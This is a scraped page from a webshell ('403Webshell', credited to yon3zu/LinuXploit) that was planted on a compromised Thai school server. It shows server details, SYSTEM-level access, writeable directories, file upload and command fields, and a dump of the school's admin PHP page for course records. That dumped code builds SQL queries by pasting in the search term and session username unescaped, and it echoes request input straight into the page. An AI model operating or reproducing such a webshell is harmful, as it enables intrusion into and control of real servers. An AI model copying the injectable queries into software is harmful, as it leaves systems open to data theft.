403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/myschool/triamudom/2566/modules123456/personal/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Inetpub/www/myschool/triamudom/2566/modules123456/personal/couse.php
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_jumpMenu(targ,selObj,restore){ //v3.0
  eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
  if (restore) selObj.selectedIndex=0;
}
//-->
</script>
<?
CheckUser($_SESSION['user_user'], $_SESSION['user_pwd']);
?>
<?php
include 'includes/connect.php';

?>
<?
class Paginator{
	var $items_per_page;
	var $items_total;
	var $current_page;
	var $num_pages;
	var $mid_range;
	var $low;
	var $high;
	var $limit;
	var $return;
	var $default_ipp;
	var $querystring;
	var $url_next;

	function Paginator()
	{
		$this->current_page = 1;
		$this->mid_range = 7;
		$this->items_per_page = $this->default_ipp;
		$this->url_next = $this->url_next;
	}
	function paginate()
	{

		if(!is_numeric($this->items_per_page) OR $this->items_per_page <= 0) $this->items_per_page = $this->default_ipp;
		$this->num_pages = ceil($this->items_total/$this->items_per_page);

		if($this->current_page < 1 Or !is_numeric($this->current_page)) $this->current_page = 1;
		if($this->current_page > $this->num_pages) $this->current_page = $this->num_pages;
		$prev_page = $this->current_page-1;
		$next_page = $this->current_page+1;


		if($this->num_pages > 10)
		{
			$this->return = ($this->current_page != 1 And $this->items_total >= 10) ? "<a class=\"paginate\" href=\"".$this->url_next.$this->$prev_page."\">&laquo; ย้อนกลับ</a> ":"<span class=\"inactive\" href=\"#\">&laquo; ย้อนกลับ</span> ";

			$this->start_range = $this->current_page - floor($this->mid_range/2);
			$this->end_range = $this->current_page + floor($this->mid_range/2);

			if($this->start_range <= 0)
			{
				$this->end_range += abs($this->start_range)+1;
				$this->start_range = 1;
			}
			if($this->end_range > $this->num_pages)
			{
				$this->start_range -= $this->end_range-$this->num_pages;
				$this->end_range = $this->num_pages;
			}
			$this->range = range($this->start_range,$this->end_range);

			for($i=1;$i<=$this->num_pages;$i++)
			{
				if($this->range[0] > 2 And $i == $this->range[0]) $this->return .= " ... ";
				if($i==1 Or $i==$this->num_pages Or in_array($i,$this->range))
				{
					$this->return .= ($i == $this->current_page And $_GET['Page'] != 'All') ? "<a title=\"Go to page $i of $this->num_pages\" class=\"current\" href=\"#\">$i</a> ":"<a class=\"paginate\" title=\"Go to page $i of $this->num_pages\" href=\"".$this->url_next.$i."\">$i</a> ";
				}
				if($this->range[$this->mid_range-1] < $this->num_pages-1 And $i == $this->range[$this->mid_range-1]) $this->return .= " ... ";
			}
			$this->return .= (($this->current_page != $this->num_pages And $this->items_total >= 10) And ($_GET['Page'] != 'All')) ? "<a class=\"paginate\" href=\"".$this->url_next.$next_page."\">ถัดไป &raquo;</a>\n":"<span class=\"inactive\" href=\"#\">&raquo; ถัดไป</span>\n";
		}
		else
		{
			for($i=1;$i<=$this->num_pages;$i++)
			{
				$this->return .= ($i == $this->current_page) ? "<a class=\"current\" href=\"#\">$i</a> ":"<a class=\"paginate\" href=\"".$this->url_next.$i."\">$i</a> ";
			}
		}
		$this->low = ($this->current_page-1) * $this->items_per_page;
		$this->high = ($_GET['ipp'] == 'All') ? $this->items_total:($this->current_page * $this->items_per_page)-1;
		$this->limit = ($_GET['ipp'] == 'All') ? "":" LIMIT $this->low,$this->items_per_page";
	}

	function display_pages()
	{
		return $this->return;
	}
}
?>
<html>
<head>

</head>
<style type="text/css"> 
<!--
	.paginate {
	font-family: Arial, Helvetica, sans-serif;
	font-size: .7em;
	}
	a.paginate {
	border: 1px solid #000080;
	padding: 2px 6px 2px 6px;
	text-decoration: none;
	color: #000080;
	}
	h2 {
		font-size: 12pt;
		color: #003366;
		}
		
		 h2 {
		line-height: 1.2em;
		letter-spacing:-1px;
		margin: 0;
		padding: 0;
		text-align: left;
		}
	a.paginate:hover {
	background-color: #000080;
	color: #FFF;
	text-decoration: underline;
	}
	a.current {
	border: 1px solid #000080;
	font: bold .7em Arial,Helvetica,sans-serif;
	padding: 2px 6px 2px 6px;
	cursor: default;
	background:#000080;
	color: #FFF;
	text-decoration: none;
	}
	span.inactive {
	border: 1px solid #999;
	font-family: Arial, Helvetica, sans-serif;
	font-size: .7em;
	padding: 2px 6px 2px 6px;
	color: #999;
	cursor: default;
	}
-->
</style>
<link href="css/template_css.css" rel="stylesheet" type="text/css" />
<body>

<form name="form3" method="post" action="?name=guide&file=tabain">

  <table width=100%  border="0" align="left" cellpadding="0" cellspacing="0">
 
    <tr class="unnamed1">
		<td width="800" class="unnamed2">
			 <a href='index.php'>
                        <img src="images/admin/exit.gif" width="35" height="35"align="middle" border="0"alt="ออกจากหน้านี้" /></a>   <A HREF="?name=guide&file=addschool&op=guide_add"><img src="images/22.png" height="35"align="middle" border="0"alt="บันทึกข้อมูล" /></a>
		</td>
		
		<td width="100" class="unnamed2">
			<div align="left">
			<strong>ระบุเงื่อนไข</strong>
			</div>
		</td>
		<td width="100">
<div align="right">
				<input name="search" type="text" id="search" value="<?=$_GET["search"];?>">
</div>
		</td>
      <td width="50">
        <div align="right">
          <input type="submit" name="Submit2" value="ค้นหา">
        </div></td>
    </tr>
  </table>

  <br>
  </form>
<?

	$strSQL = "SELECT * FROM ".TB_GUIDE." where name like '%$search%' ";



$objQuery = mysql_query($strSQL) or die ("Error Query [".$strSQL."]");
$Num_Rows = mysql_num_rows($objQuery);

$Per_Page = 20;   // Per Page

$Page = $_GET["Page"];
if(!$_GET["Page"])
{
	$Page=1;
}

$Prev_Page = $Page-1;
$Next_Page = $Page+1;

$Page_Start = (($Per_Page*$Page)-$Per_Page);
if($Num_Rows<=$Per_Page)
{
	$Num_Pages =1;
}
else if(($Num_Rows % $Per_Page)==0)
{
	$Num_Pages =($Num_Rows/$Per_Page) ;
}
else
{
	$Num_Pages =($Num_Rows/$Per_Page)+1;
	$Num_Pages = (int)$Num_Pages;
}

$strSQL .="  ORDER BY id desc LIMIT $Page_Start , $Per_Page";
$objQuery  = mysql_query($strSQL);
?>

<br>
<!-- Strat sum-->
<div align="center"> 	
 <table width="100%" cellspacing="1" cellpadding="1" >

			<tr>
 <td  height=25>
<?


		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
?>
<FONT COLOR=RED>  โรงเรียน<? echo $arr[user][category_name];?> </FONT>

	

</td>
	 </tr>
				</table>
			<!-- End sum-->

	<TABLE cellSpacing=0 cellPadding=0 width=100% height=400 border=0>
      <TBODY>
        <TR>

          <TD  vAlign=top>
<!-- user -->
		<div align="center"> 
</div>		
				<TABLE width="100%" align=center cellSpacing=0 cellPadding=0 border=0>
<form action="?name=admin&file=guide&op=guide_del&action=multidel" name="myform" method="post">
 <table width="100%" cellspacing="2" cellpadding="1" >
  <tr bgcolor="#336633" height=25>
   <td  align=center width="5%"><font color="#FFFFFF"><B>ลบ</B></font></td>
   <td width="15%"  align=center ><font color="#FFFFFF"><B>ชื่อหลักสูตร</B></font></td>
   <td  align=center width="10%"><font color="#FFFFFF"><B>หน่วยงานผู้จัด</B></font></td>
	<td width="10%" align=center ><font color="#FFFFFF"><B>วัน เดือน ปี</B></font></td>
   <td width="10%"  align=center ><font color="#FFFFFF"><B>งบประมาณ</B></font></td>
	<td width="5%" align=center ><font color="#FFFFFF"><B>แก้ไข</B></font></td>
  </tr>  
<?
//	CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
//แสดงบทความ
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
$limit = 20 ;
$SUMPAGE = $db->num_rows(TB_GUIDE,"id","$SQLwhere school ='".$arr[user][category_name]."' ");
$page=$_GET[page];
if (empty($page)){
	$page=1;
}
$rt = $SUMPAGE%$limit ;
$totalpage = ($rt!=0) ? floor($SUMPAGE/$limit)+1 : floor($SUMPAGE/$limit); 
$goto = ($page-1)*$limit ;
$res[couse] = $db->select_query("SELECT * FROM ".TB_COUSE." WHERE school ='".$arr[user][category_name]."'     ORDER BY id DESC LIMIT $goto, $limit   ");
$count=0;
while($arr[couse] = $db->fetch($res[couse]))
	{
	if ($count==0) { echo "<TR>"; }
?>
			<tr bgcolor="#E6FEDE"height=20>
  <td align="center" >
	  <a href="javascript:Confirm('?name=admin&file=sent&op=guide_del&id=<?=$arr[guide][id];?>&level=<?echo $arr[groups][name];?>','คุณมั่นใจในการลบ: <?echo $arr[guide][name];?> <?echo $arr[guide][sername];?>');"><img src="images/admin/trash.gif"  border="0" alt="ลบ" ></a>
	</td> 
     <td><?echo $arr[couse][couse];?></td>
     <td align="center"> <? echo $arr[couse][department];?></td>
	<td><?=$arr[couse][date];?></td>
	<td><?=$arr[couse][budget];?></td>
	<td><?=$arr[guide][vit];?>  </td>
	<td align="center"><a href=?name=guide&amp;file=addcouse&op=guide_add&amp;id= <?=$arr[guide][id];?>','acepopup','1024','720','center','front');"><font color=red>เพิ่มข้อมูล</font></a></td> 
	
	
<!-----จบตรวตสอบไปเรียนต่างสังกัด---->
	 </TR>
	<?
$count++;
if (($count%1) == 0) { echo ""; $count=0; }
}
$db->closedb ();
//จบการแสดงข่าวสาร
?> 
				</table>

 </form>		</TR></TD></TABLE>
				<BR>
				<table border="0" cellpadding="0" cellspacing="1" width="100%" align=center>
					<tr>
						<td>
	
				<?
			$pages = new Paginator;
			$pages->items_total = $Num_Rows;
			$pages->mid_range = 10;
			$pages->current_page = $Page;
			$pages->default_ipp = $Per_Page;
				SplitPage($page,$totalpage,"?name=guide&op=guide_read&file=mytabainschool&category=".$_GET[category]."");
				echo $ShowSumPages ;
				echo "<BR>";
				echo $ShowPages ;
				?> 
					</TD>
				</TR>
			</TABLE>
			<!-- Admin -->
		  </TD>
        </TR>
      </TBODY>
    </TABLE>

Youez - 2016 - github.com/yon3zu
LinuXploit